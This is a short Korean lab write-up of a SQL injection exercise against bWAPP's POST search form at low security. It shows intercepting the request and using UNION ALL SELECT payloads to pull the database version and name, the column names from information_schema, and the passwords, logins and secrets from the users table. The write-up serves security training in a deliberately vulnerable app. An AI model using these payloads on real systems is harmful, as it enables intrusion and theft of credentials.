bWAPP SQL Injection [ POST/Search ] Current : low
Search를 눌러 문제페이지를 분석해보면 아래와 같이
POST
방식으로 URL
에 매개변수를 노출하고 있지 않습니다.따라서 Search 를 눌러 패킷을 잡고 분석해본 결과 아래와 같이
title
변수와 , action
변수가 노출됩니다.따라서 아래와 같이
1' UNION ALL SELECT 1,@@version,3,4,database(),6,7#
문을 이용하여 데이터베이스의 정보를 확인합니다.확인 결과 아래와 같이 버전과 , 데이터베이스 이름이 노출됩니다.
1' UNION ALL SELECT 1,column_name,3,4,5,6,7 from information_schema.columns#
를 통해 칼럼명을 알아냅니다.알아낸 결과 아래와 같이
id , login , password , email , secret ,email
등 다양한 데이터 정보가 노출됩니다. 이를 통해
1' UNION ALL SELECT 1,password,login,secret,5,6,7 from users#
문을 통해 중요 정보를 알아낼수있습니다.
댓글
댓글 쓰기